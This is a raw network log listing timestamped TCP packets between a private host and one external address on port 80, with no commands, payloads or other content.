Dec 3, 2023 17:22:50.586631060 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:50.586735964 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:50.821022034 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:50.821053982 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:50.821070910 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:50.821088076 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:50.821259022 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:50.821269035 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:50.821294069 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:50.821459055 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:50.821506023 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:50.821573973 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:50.821830988 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:50.821846962 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:50.821957111 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:50.823697090 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:50.823837042 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:50.823905945 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:50.824050903 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:50.824100018 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.056488037 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.056536913 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.056570053 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.056601048 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.056634903 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.056876898 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.057707071 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.057740927 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.057924032 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.058049917 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.058240891 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.058273077 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.058305025 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.058340073 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.058419943 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.058453083 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.058492899 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.058623075 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.058758974 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.058768988 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.058804989 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.058845043 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.058881044 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.058914900 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.059007883 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.059148073 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.059283018 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.059303999 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.059433937 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.059456110 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.059555054 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.059720039 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.059830904 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.060820103 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.060951948 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.291585922 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.291620016 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.291635036 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.291773081 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.291866064 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.291956902 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.291973114 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.291986942 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.292073965 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.293287039 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.293317080 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.293468952 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.293495893 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.293584108 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.293715954 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.293788910 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.295420885 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.295447111 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.295692921 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.295857906 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.296448946 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.296503067 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.296618938 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.296643019 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.296725035 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.296746969 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.296823978 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.296926022 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.296994925 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.297226906 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.297276974 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.297316074 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.297369003 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.297476053 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.297553062 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.297641993 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.297719955 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.297866106 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.297941923 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.298005104 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.298108101 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.298109055 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.298182011 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.298296928 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.298386097 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.298440933 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.298518896 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.298686028 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.298748970 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.298806906 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.298911095 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.298999071 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.299079895 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.299139023 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.299222946 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.299309969 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.299381018 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.299484968 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.299566031 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.299587965 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.299654961 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.299818039 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.299907923 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.300134897 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.300151110 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.300208092 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.300246954 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.300308943 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.300403118 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.300498962 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.300585032 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.300885916 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.300949097 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.301774025 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.301928043 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.302623987 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.302774906 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.302851915 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.302943945 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.302956104 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.303030014 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.303936958 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.304055929 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.526454926 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.526489019 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.526506901 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.526587963 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.526655912 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.526750088 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.526819944 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.526839972 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.526923895 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.527074099 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.527148962 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.527993917 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.528053999 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.528285980 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.528347969 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.528493881 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.528508902 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.528548956 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.528587103 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.528680086 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.528695107 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.528768063 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.529181957 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.529257059 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.530409098 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.530426025 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.530489922 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.530550003 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.530567884 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.530603886 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.530633926 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.530879974 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.530894995 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.530951977 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.531168938 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.531229019 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.531255007 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.531310081 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.531532049 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.531599045 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.531738043 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.531753063 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.531824112 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.532025099 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.532041073 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.532100916 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.532243967 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.532313108 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.532493114 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.532509089 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.532555103 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.532601118 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.532710075 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.532782078 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.532846928 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.532918930 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.533174992 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.533190012 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.533258915 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.533389091 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.533462048 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.533706903 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.533720970 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.533782005 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.534148932 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.534162998 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.534235001 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.534415960 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.534430981 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.534492016 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.534786940 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.534802914 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.534857988 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.535079002 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.535094023 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.535145044 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.535181046 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.535450935 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.535469055 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.535533905 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.537502050 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.537662029 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.537733078 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.537775040 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.537792921 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.537807941 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.537852049 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.537858963 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.537991047 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.538122892 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.538321972 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.538435936 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.538686991 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.538752079 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.538953066 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.539196014 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.539261103 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.539458990 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.539814949 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.542478085 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.761153936 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.761182070 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.761198997 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.761384964 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.761534929 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.761610985 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.761722088 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.762031078 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.762248039 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.762375116 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.762424946 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.762578011 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.762676954 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.762922049 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.763046980 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.763546944 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.763564110 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.763655901 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.763772964 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.763978958 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.764523029 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.764539957 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.766170979 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.766225100 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.766257048 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.766274929 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.766288042 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.766288996 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.767426014 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.767525911 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.767584085 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.767584085 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.767667055 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.767667055 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.770452023 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.770492077 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.770492077 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.770509958 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.772789955 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.772861958 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.774466038 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.774482965 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.774512053 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.774602890 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.774625063 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.774633884 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.774661064 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.774698019 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.774724007 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.774797916 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.774797916 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.774857998 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.774878979 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.774878979 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.775479078 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.775681019 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.775732994 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.776314020 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.776314020 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.838857889 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.996387005 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.996520042 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:51.996542931 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:51.996591091 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.000565052 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.000624895 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.001763105 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.001873016 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.002104044 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.002119064 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.002134085 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.002149105 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.002207994 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.004832029 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.005633116 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.005676031 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.005737066 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.005858898 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.006071091 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.006124973 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.006464005 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.006522894 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.006578922 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.006654024 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.006712914 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.006788969 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.006812096 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.007493973 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.007714987 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.007797956 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.007832050 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.007868052 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.010149002 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.010184050 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.010198116 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.010211945 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.010210991 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.010229111 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.010243893 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.010272026 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.010292053 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.010294914 CET	80	49737	80.66.89.151	192.168.2.4
